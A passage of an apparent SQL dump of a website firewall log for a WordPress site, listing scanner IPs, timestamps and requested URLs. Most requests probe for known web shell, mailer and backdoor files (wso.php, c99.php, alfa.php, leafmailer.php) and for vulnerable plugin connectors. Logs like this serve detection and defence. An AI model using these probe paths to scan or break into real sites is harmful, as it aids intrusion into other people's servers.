78',351544398,'',0,1674492631.3077,55,'8qiSKzkFpOCjVA6Iub4Y95XH','','19|0|0|0|www.dailyjolly.co.uk/7yn.php',0,19,0),('20.244.36.78',351544398,'',0,1674492632.2767,55,'2ag8L6wDlX3thzr0BkcfPG7d','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('20.244.36.78',351544398,'',0,1674492633.2259,55,'HSGlQCxY4KITo3uc0RDhPfLw','','19|0|0|0|www.dailyjolly.co.uk/13.php',0,19,0),('20.244.36.78',351544398,'',0,1674492634.1074,55,'haMz1sg0FLbV3r5KOZByPExj','','19|0|0|0|www.dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('20.244.36.78',351544398,'',0,1674492634.9580,55,'3p5B8ZthaiLXS1nRmw0Tvclu','','19|0|0|0|www.dailyjolly.co.uk/alf.php',0,19,0),('20.244.36.78',351544398,'',0,1674492635.8699,55,'FIgS47sel8notCOYrXzyMxqh','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('20.244.36.78',351544398,'',0,1674492636.7755,55,'qRTSrO73mzvbUIoGK9JYW4Pn','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.244.36.78',351544398,'',0,1674492638.1464,55,'M4aLeWAhlDXPd6w2TrY7xs3N','','19|0|0|0|www.dailyjolly.co.uk/WSO.php',0,19,0),('20.244.36.78',351544398,'',0,1674492639.9498,55,'VfXcuKAhqLsxaPROGUZSn1wE','','19|0|0|0|www.dailyjolly.co.uk/hello.php',0,19,0),('20.244.36.78',351544398,'',0,1674492641.4386,55,'pcEglSa0szR4yeOCI3dxHfA1','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('20.244.36.78',351544398,'',0,1674492642.4052,55,'kribenouBDvNQZK1E78Imzj0','','19|0|0|0|www.dailyjolly.co.uk/kk.php',0,19,0),('20.244.36.78',351544398,'',0,1674492643.3121,55,'cuwDLlsjgxiqrv0y6VoBU9NE','','19|0|0|0|www.dailyjolly.co.uk/mrjn.php',0,19,0),('20.244.36.78',351544398,'',0,1674492644.1977,55,'cE4hKtu29x3NIOLCnbFAXpY5','','19|0|0|0|www.dailyjolly.co.uk/kn.php',0,19,0),('20.244.36.78',351544398,'',0,1674492645.0827,55,'JXksMgHGxuUnBiOpfSDjy2lK','','19|0|0|0|www.dailyjolly.co.uk/3301.php',0,19,0),('20.244.36.78',351544398,'',0,1674492645.9852,55,'JZfWOBklLRIxjVqpQw0Hom65','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1674492646.8324,55,'CjQnkYO6fcVabWpHBUtyDRrs','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('20.244.36.78',351544398,'',0,1674492647.7394,55,'VdiKt6rTvqzPxQFbsMfwueAY','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.244.36.78',351544398,'',0,1674492648.6002,55,'NXIwoSLWUgqDt1efylmK2xph','','19|0|0|0|www.dailyjolly.co.uk/anone.php',0,19,0),('20.244.36.78',351544398,'',0,1674492649.5576,55,'3Fordx4M9QfCNajwXSHnJKks','','19|0|0|0|www.dailyjolly.co.uk/wp-configer.php',0,19,0),('20.244.36.78',351544398,'',0,1674492650.4472,55,'H5Xqt7OIwngBRcCjGsS0v4d3','','19|0|0|0|www.dailyjolly.co.uk/wp-ad.php',0,19,0),('20.244.36.78',351544398,'',0,1674492651.3174,55,'OmDln6c2Iqp4f0SJVMKTGUuj','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('20.244.36.78',351544398,'',0,1674492652.2434,55,'CbQ10skAzVv3erUjJ9fma4BS','','19|0|0|0|www.dailyjolly.co.uk/.wp-cache.php',0,19,0),('20.244.36.78',351544398,'',0,1674492653.1649,55,'pxkUOMh4dHW8E3SvugYiBe9N','','19|0|0|0|www.dailyjolly.co.uk/sendmail.php',0,19,0),('20.244.36.78',351544398,'',0,1674492654.0425,55,'QmDX8UMlThiqZObcF6xG57wP','','19|0|0|0|www.dailyjolly.co.uk/rahma.php',0,19,0),('20.244.36.78',351544398,'',0,1674492654.9304,55,'5wOHK3xQqjW1A6UzsIbehCMR','','19|0|0|0|www.dailyjolly.co.uk/nasgor.php',0,19,0),('20.244.36.78',351544398,'',0,1674492655.7755,55,'LhNYHP3oAlqTWpFIgVrO7jux','','19|0|0|0|www.dailyjolly.co.uk/wp-confirm.php',0,19,0),('20.244.36.78',351544398,'',0,1674492656.6289,55,'9rVZWRYpyCuPAbqOFkNd71I4','','19|0|0|0|www.dailyjolly.co.uk/alfa123.php',0,19,0),('20.244.36.78',351544398,'',0,1674492657.5107,55,'VnOI9lHxqPAZ3m1YaWQJE067','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('20.244.36.78',351544398,'',0,1674492658.3989,55,'bUrvfHWnAc9VP1iyeopwhkqO','','19|0|0|0|www.dailyjolly.co.uk/bypass.php',0,19,0),('20.244.36.78',351544398,'',0,1674492659.3082,55,'OzdKcpsmlRTiLku3xh26AbFn','','19|0|0|0|www.dailyjolly.co.uk/wp-one.php',0,19,0),('20.244.36.78',351544398,'',0,1674492660.1839,55,'FC9OgKuTN3rkYwE1ZWndMmq4','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('20.244.36.78',351544398,'',0,1674492661.0775,55,'5e6i41BzbpJlQntsh2wfjmK8','','19|0|0|0|www.dailyjolly.co.uk/wso1337.php',0,19,0),('40.113.104.238',678521070,'',0,1674524921.8767,55,'PmHYDS8Cl4npgbqRBXIwyJ9s','','19|0|0|0|dailyjolly.co.uk/cgi-etc/xxxxxxxxxxxx.php',0,19,0),('40.113.104.238',678521070,'',0,1674528289.6087,55,'zrDSZKyfT0xmsUw264p3vBkj','','19|0|0|0|dailyjolly.co.uk/wso112233.php',0,19,0),('3.95.191.101',56606565,'',0,1674529155.3883,55,'bsXtYq8iNmMruFlpJIR2Q5V7','','19|0|0|0|dailyjolly.co.uk/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',0,19,0),('3.95.191.101',56606565,'',0,1674529171.7521,55,'O46IsGYSjWbANh0wXmfdBqK1','','19|0|0|0|dailyjolly.co.uk/radio.php',0,19,0),('3.95.191.101',56606565,'',0,1674529190.5413,55,'DXMIxg0Jh28ECktANLSoWZ7q','','19|0|0|0|dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('3.95.191.101',56606565,'',0,1674529204.4532,55,'NXRh8SdEpszDyC23kojTeJr5','','19|0|0|0|dailyjolly.co.uk/wp-content/radio.php',0,19,0),('3.95.191.101',56606565,'',0,1674529218.8486,55,'jm2XAoybhTFZBlegqxDWKiJ7','','19|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('3.95.191.101',56606565,'',0,1674529218.8975,10,'jm2XAoybhTFZBlegqxDWKiJ7','','707|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,707,0),('104.243.43.39',1760766759,'',0,1674548333.4797,55,'H1sOr5l60Mwkei2QVuIZhWpP','','19|0|0|0|dailyjolly.co.uk/wp-plain.php',0,19,0),('104.243.43.39',1760766759,'',0,1674548333.8221,55,'fWcBCPLxtVy7S6NuOHAh52rZ','','19|0|0|0|dailyjolly.co.uk/uowvuwvd.php',0,19,0),('185.36.81.21',3106165013,'',0,1674569719.6706,55,'PhnIVxWKLojH7wOT6dBcfZXl','','19|0|0|0|dailyjolly.co.uk/sites/all/modules/fckeditor/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('139.162.111.201',2342678473,'',0,1674571870.0818,55,'ZdHJgFYNkG8MpUxvhKRI3swP','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('139.162.111.201',2342678473,'',0,1674571871.4620,55,'MTqwfVkp0lu4mPagJQ7rxhoi','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('139.162.111.201',2342678473,'',0,1674571872.7912,55,'qIJPyVK62S7FWaE0CxTdHGfb','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('139.162.111.201',2342678473,'',0,1674571874.1684,55,'RYQmrpg8atAl36sNjJUVf1XW','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-content.php',0,19,0),('139.162.111.201',2342678473,'',0,1674571876.2790,55,'EAvkqQIwybfPuZW7eaNLTcJK','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('139.162.111.201',2342678473,'',0,1674571876.3032,10,'EAvkqQIwybfPuZW7eaNLTcJK','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,707,0),('185.107.237.201',3110858185,'',0,1674580167.1232,55,'W7MJvzu2Hid5YD0EI4AycZL8','','19|0|0|0|dailyjolly.co.uk/sitemap.php',0,19,0),('128.199.218.40',2160581160,'',0,1674595167.3605,55,'H4IoiTY9DpjdP2Zx6US0NaL1','','19|0|0|0|dailyjolly.co.uk/wp-commentin.php',0,19,0),('128.199.218.40',2160581160,'',0,1674595167.3662,55,'a3FU5rhPgImOz1b9XioTcLqB','','19|0|0|0|dailyjolly.co.uk/wp-cc.php',0,19,0),('194.5.82.48',3255128624,'',0,1674604007.1920,55,'tEC5ZiYupyJNSG2cO7baH3WF','','19|0|0|0|dailyjolly.co.uk/wp-admin/imagescheckflush.php',0,19,0),('178.62.67.97',2990424929,'',0,1674621808.7474,55,'ujhZmyJga6LfNYq4TFOK1DwV','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('51.91.27.225',861608929,'',0,1674621808.9302,55,'TCq6xl5egD7tUiEz3WpVAI4Z','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('178.62.67.97',2990424929,'',0,1674621809.1797,55,'2WocFBijuJ4ANpd3QzRs9Thg','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('51.91.27.225',861608929,'',0,1674621809.2981,55,'zsw4E7RCAdWxGBXHQmeoThb8','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('178.62.67.97',2990424929,'',0,1674621809.4784,55,'4XuWSiyxGdhlazbkIsRJtNBT','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('51.91.27.225',861608929,'',0,1674621809.5411,55,'FwXpi6sECTUdkmgJ0HKo8nu3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/classic/inc/index.php',0,19,0),('178.62.67.97',2990424929,'',0,1674621809.7009,55,'j1xSr74gquiy5Id3O8WATVUZ','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-content.php',0,19,0),('51.91.27.225',861608929,'',0,1674621809.8537,55,'1veWFrNzin6UqBP0TI38EJx7','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-content.php',0,19,0),('178.62.67.97',2990424929,'',0,1674621810.0030,55,'c94giWqLDhFEawxUuApNfb1v','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('178.62.67.97',2990424929,'',0,1674621810.0454,10,'c94giWqLDhFEawxUuApNfb1v','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,707,0),('51.91.27.225',861608929,'',0,1674621810.0950,55,'jURm6s1VdnzN98gkBFIDtaxi','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('51.91.27.225',861608929,'',0,1674621810.1529,10,'jURm6s1VdnzN98gkBFIDtaxi','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,707,0),('20.231.18.49',350687793,'',0,1674655121.8940,55,'M7rHsxiYJVQDylacZ4N1oFuw','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/05/.cpt_wyhta.php',0,19,0),('20.231.18.49',350687793,'',0,1674655123.6007,55,'WBjM5ErwaFAqXhCYRNH6DK4z','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/typehub/custom/hafwg/.cpt.php',0,19,0),('206.189.136.160',3468527776,'',0,1674657068.3749,55,'XMxTlKP3kEfCpArij7baY5Ge','','19|0|0|0|www.dailyjolly.co.uk/wordpress/xmlrpc.php',0,19,0),('206.189.136.160',3468527776,'',0,1674657070.6388,55,'gwMbPRGh7JleB3cmT45vo2Xq','','19|0|0|0|www.dailyjolly.co.uk/wp/xmlrpc.php',0,19,0),('90.156.169.206',1520216526,'',0,1674659543.0200,55,'wNHr8lv7WODI5BpidYcAZEnU','','19|0|0|0|dailyjolly.co.uk/wp-admin/style.php',0,19,0),('90.156.169.206',1520216526,'',0,1674659543.0865,55,'ae47O6yNtQJZHDLY1M9KXh5b','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('3.26.169.116',52078964,'',0,1674674224.7605,55,'g9jtPZ1TiW0G4EnzNAvp7RKD','','19|0|0|0|www.dailyjolly.co.uk/shell4.php',0,19,0),('3.26.169.116',52078964,'',0,1674674226.8839,55,'kpuH4ryo3PAgaJOqxItv7Thl','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('3.26.169.116',52078964,'',0,1674674229.0105,55,'nFN9xmjSBTQ2VLPwJMWRipEd','','19|0|0|0|www.dailyjolly.co.uk/ru.php',0,19,0),('3.26.169.116',52078964,'',0,1674674231.1742,55,'5Xkfv1SB9LDyI4Rhq6dxuEt0','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('3.26.169.116',52078964,'',0,1674674233.4886,55,'tFLqsEYAg50yP7BUST9Icwna','','19|0|0|0|www.dailyjolly.co.uk/vuln.php',0,19,0),('3.26.169.116',52078964,'',0,1674674233.5698,10,'tFLqsEYAg50yP7BUST9Icwna','','707|0|0|0|www.dailyjolly.co.uk/vuln.php',0,707,0),('3.26.169.116',52078964,'',0,1674674235.6865,55,'7W0OxgP9ufLwTjstcyX2Uphm','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('3.26.169.116',52078964,'',0,1674674237.8093,55,'fqLt1P4iSVbWKy7JsrIHZxgk','','19|0|0|0|www.dailyjolly.co.uk/skipper.php',0,19,0),('3.26.169.116',52078964,'',0,1674674239.9354,55,'HQ8sMtq5cLD7eaiC2ElpnGTb','','19|0|0|0|www.dailyjolly.co.uk/skippershell.php',0,19,0),('3.26.169.116',52078964,'',0,1674674242.1155,55,'BixqCjw1tKsGrSavDEyncXoF','','19|0|0|0|www.dailyjolly.co.uk/tttt.php',0,19,0),('3.26.169.116',52078964,'',0,1674674244.2592,55,'M2TgAvDeZQYpGsEdkWR8NO67','','19|0|0|0|www.dailyjolly.co.uk/tshop.php',0,19,0),('3.26.169.116',52078964,'',0,1674674246.3807,55,'73XTaiIOoWxU29G6uqSw5zDc','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('3.26.169.116',52078964,'',0,1674674248.4889,55,'tj6eBAfx5ZlMgdR4kTHuyhbP','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('3.26.169.116',52078964,'',0,1674674250.6302,55,'2rzD6iuvIlWoGpc9hFxJgORA','','19|0|0|0|www.dailyjolly.co.uk/inje3ctor.php',0,19,0),('3.26.169.116',52078964,'',0,1674674252.7554,55,'JXCcTh4835ewlBDVmkPx9GtW','','19|0|0|0|www.dailyjolly.co.uk/saudi.php',0,19,0),('3.26.169.116',52078964,'',0,1674674254.8975,55,'sI4iC1vtoTQjWZe0b3hYVXFB','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('3.26.169.116',52078964,'',0,1674674257.0207,55,'7wPyumJ1Ct4IiAS5XlcgWZph','','19|0|0|0|www.dailyjolly.co.uk/alfashell.php',0,19,0),('3.26.169.116',52078964,'',0,1674674259.1597,55,'53RFGq9YyB4isDHXA8cIl7EV','','19|0|0|0|www.dailyjolly.co.uk/my_alfa.php',0,19,0),('3.26.169.116',52078964,'',0,1674674261.3228,55,'y3tHSB9VQZ5lkdjI1GUx7mEq','','19|0|0|0|www.dailyjolly.co.uk/uploader.php',0,19,0),('3.26.169.116',52078964,'',0,1674674263.5013,55,'JRw70e9G2iUXHbLQN8BTZCIK','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('3.26.169.116',52078964,'',0,1674674265.6094,55,'CjXaQNeDgPvlUuMIf8pS9HJL','','19|0|0|0|www.dailyjolly.co.uk/hacked.php',0,19,0),('3.26.169.116',52078964,'',0,1674674268.0657,55,'OYmMFHCKjdTtbiG6kP3p7agS','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('3.26.169.116',52078964,'',0,1674674270.1891,55,'eSdV5jsKN60PIovc27DnCqQU','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('3.26.169.116',52078964,'',0,1674674272.3619,55,'ZOwfIbUc70BSvatVHQ4jDqGN','','19|0|0|0|www.dailyjolly.co.uk/Navir.php',0,19,0),('3.26.169.116',52078964,'',0,1674674274.4684,55,'KYbnMHdy7i5mVpBu0t1rljaF','','19|0|0|0|www.dailyjolly.co.uk/cmd13.php',0,19,0),('3.26.169.116',52078964,'',0,1674674276.6440,55,'UjlzZ4oN9RmprIgQHxVhqEBO','','19|0|0|0|www.dailyjolly.co.uk/inc20k1.php',0,19,0),('3.26.169.116',52078964,'',0,1674674278.8525,55,'H8JcaZPeCGIEnSrjhlgR7LyX','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('3.26.169.116',52078964,'',0,1674674281.0098,55,'jcgoLlRpsNEZS2A3vwQ1eIbu','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('3.26.169.116',52078964,'',0,1674674283.1615,55,'HMpRYF5U7ZQu39ksgNzdeS1L','','19|0|0|0|www.dailyjolly.co.uk/swm.php',0,19,0),('3.26.169.116',52078964,'',0,1674674285.3143,55,'szp9LGBUuV3qO7DPZWhJdHQt','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('3.26.169.116',52078964,'',0,1674674287.4714,55,'VxBh4bkIgNHpWQS3qnouFvfi','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('3.26.169.116',52078964,'',0,1674674289.5681,55,'94K73A2ZXoNOIkmswvWxRrVg','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('3.26.169.116',52078964,'',0,1674674291.7619,55,'NO2Qq5RuSI70tGpVfXsWre3Z','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('3.26.169.116',52078964,'',0,1674674293.9251,55,'2puILEnTDWFzUmZHv3lb7tj5','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('3.26.169.116',52078964,'',0,1674674296.0642,55,'mSLj9eX0RcUIiHQqA3oszkh8','','19|0|0|0|www.dailyjolly.co.uk/edit-form.php',0,19,0),('3.26.169.116',52078964,'',0,1674674298.2146,55,'aO4VeDwyI5ZKpErduNYJUMqh','','19|0|0|0|www.dailyjolly.co.uk/LEAF.php',0,19,0),('3.26.169.116',52078964,'',0,1674674300.3122,55,'MBTlDWV8asRqCKtvSwdyL165','','19|0|0|0|www.dailyjolly.co.uk/leafmailer.php',0,19,0),('3.26.169.116',52078964,'',0,1674674302.4999,55,'0gvfOVLyao2lq6nIKw5RsxMB','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('3.26.169.116',52078964,'',0,1674674304.6713,55,'o4Jab5hgwEv2YzeMPWNOCTsZ','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('3.26.169.116',52078964,'',0,1674674306.8046,55,'xHrvRDo7bJd9ZuWSwPa2GCVt','','19|0|0|0|www.dailyjolly.co.uk/Leaf.php',0,19,0),('3.26.169.116',52078964,'',0,1674674308.9316,55,'qO9R3uPQg7pl4TGVIjBXymzd','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('3.26.169.116',52078964,'',0,1674674311.1019,55,'dVjC9sih8N0tMZ2YbXxGFAeU','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('3.26.169.116',52078964,'',0,1674674313.2441,55,'hWxSbAqJaX7Gv3eznILdH5sC','','19|0|0|0|www.dailyjolly.co.uk/srx.php',0,19,0),('3.26.169.116',52078964,'',0,1674674315.3808,55,'e5YdnbjJoOfPmZ0tpvcqlxDT','','19|0|0|0|www.dailyjolly.co.uk/1337.php',0,19,0),('3.26.169.116',52078964,'',0,1674674317.4839,55,'9R0gIcLpfPKq2FuBaAQzwU7m','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('3.26.169.116',52078964,'',0,1674674319.6659,55,'se3NzgGx5fYQu87khSPLaBEc','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('3.26.169.116',52078964,'',0,1674674321.8066,55,'uyvqX6Y74oshzVAxGDHQF19O','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('3.26.169.116',52078964,'',0,1674674323.9134,55,'XMQRFhBJY7vp5m0rkiaVqyO9','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('3.26.169.116',52078964,'',0,1674674326.0662,55,'Yc4SEd8JCtqZQeHyW7vin6rX','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('3.26.169.116',52078964,'',0,1674674328.2335,55,'tFSBIfLdZRYDGOX7e5W3E0yq','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('3.26.169.116',52078964,'',0,1674674330.4511,55,'S9h5KByM2R1sCmj7YQnOuJUH','','19|0|0|0|www.dailyjolly.co.uk/gaza.php',0,19,0),('3.26.169.116',52078964,'',0,1674674332.5838,55,'EvlwedV2hfaxy7j5sHLcq4JY','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('3.26.169.116',52078964,'',0,1674674334.7479,55,'OxTQ24LHJfY6srWcBSDZVhlp','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('3.26.169.116',52078964,'',0,1674674336.8752,55,'Uz5svTA7mFbudXQxpPKiwlYO','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('3.26.169.116',52078964,'',0,1674674339.0144,55,'dtaejTLyO3IcZCBsF9R8u6DJ','','19|0|0|0|www.dailyjolly.co.uk/wso1.php',0,19,0),('3.26.169.116',52078964,'',0,1674674341.1298,55,'cBX1ahTpqWAEDmKIdHe6z0jV','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('3.26.169.116',52078964,'',0,1674674343.2389,55,'XJtkZpuvsogySIm2lfRcYUh5','','19|0|0|0|www.dailyjolly.co.uk/Lux.php',0,19,0),('3.26.169.116',52078964,'',0,1674674345.7238,55,'KPvwdalS9Og3tpXneHiqjLVQ','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716238.9282,55,'WpUL5xJsqcw42tIDRT9kdS0a','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716241.5065,55,'3cOud1fY8bNGHljMCJIAKSkg','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2021/12/up.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716244.4199,55,'C0iJbRtuK8e4V5aUXqsBSkgp','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716245.4440,55,'x7lW4XnvPJh3zOpDRiKwgIjb','','19|0|0|0|www.dailyjolly.co.uk/shells.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716249.2652,55,'IbeNsKWZHo9Mh2F0OA78gvLB','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716249.3152,10,'IbeNsKWZHo9Mh2F0OA78gvLB','','707|0|0|0|www.dailyjolly.co.uk/about.php',0,707,0),('196.74.207.174',3293237166,'',0,1674716250.3243,55,'zyQ4ZaoMvPXAJL5rWYhBT3jn','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/alfa.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716251.0479,55,'E3hpVT6JgQHOy7LoMkjbAmKN','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716252.1731,55,'vln0eXwZt9qJQ2RTN3Fi4K7o','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fw.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716254.3490,55,'6bzkhS0q7etiD2MOcYT8l1A9','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716255.3931,55,'IM4TWvOKC32u6HrDs8ZqY1Nm','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/fw.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716256.2147,55,'wDaCGLn1QR4NZz06VgEAWkdl','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716257.9182,55,'WV1Yy7lXZPmGgqJtLiavQhrO','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wso.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716258.6233,55,'62lPF1zyROKUcGxubZWwBhkD','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wso.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716259.3221,55,'bfoMxNlyHkZinQjg687aDvze','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/wso.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716259.9393,55,'DnXsv742BwcifjHCVA8PmLrN','','19|0|0|0|www.dailyjolly.co.uk/wp-22.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716260.7492,55,'s1jVaYn24BblyJFWoKhX8xiT','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716262.1522,55,'XDV4UdR63mvQgSG25r9s1pzP','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716264.0027,55,'7o5eA1E4TkQIWlM2FsjCwGgJ','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('196.74.207.174',3293237166,'',0,1674716265.7839,55,'FEfLXyUmZ9hnY2MeQISAbVdT','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('109.248.175.137',1845014409,'',0,1674721436.2510,55,'bwpyrYEFK1tG65mvkeRxMQXV','','19|0|0|0|www.dailyjolly.co.uk/bala.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729492.9740,55,'6eXOU8oEaFwG5l3ANji1MB0n','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729494.8120,55,'FeMHR6sxydUXo0YtGvWciL1E','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729495.7311,55,'LN6UrIaJ0oum49de3QltPHfO','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729497.3026,55,'uObXGe7Nj9sDk6pvcZFJ8M5V','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729498.4983,55,'jVBXZ4FAcqky0YLf5z3teCEU','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729498.5556,10,'jVBXZ4FAcqky0YLf5z3teCEU','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('196.74.207.174',3293237166,'',0,1674729500.9279,100,'1gVB6YlpyvEjkodNOLJUPX5z','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('196.74.207.174',3293237166,'',0,1674729504.1629,55,'Us0wi3XtZDz7yBa6cS1eRgHd','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729505.6346,55,'0ei9gTD2FMtmCEvRwxBPoJhc','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729507.8429,55,'VZtcL1DETz6Rdeix2umnMFbB','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729511.8646,55,'aw0A5hU12DrNWMiLs3pb8Iv4','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729514.4705,55,'xMBsC8yiDbpWveK3gok2T90U','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729524.5187,55,'eMGftmxPFEhUpJaTlzdyKRB2','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729525.8873,55,'z5YFVayg9fWjLebOHlZxw4P7','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729529.4513,55,'QEFsL26KZ09rGSp1TueVw4qt','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729536.3049,55,'B61SkRI7CK4piEe2bOLaH5F9','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('196.74.207.174',3293237166,'',0,1674729540.2040,55,'FdmZklcLBfJME0gDvrxRpUH4','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0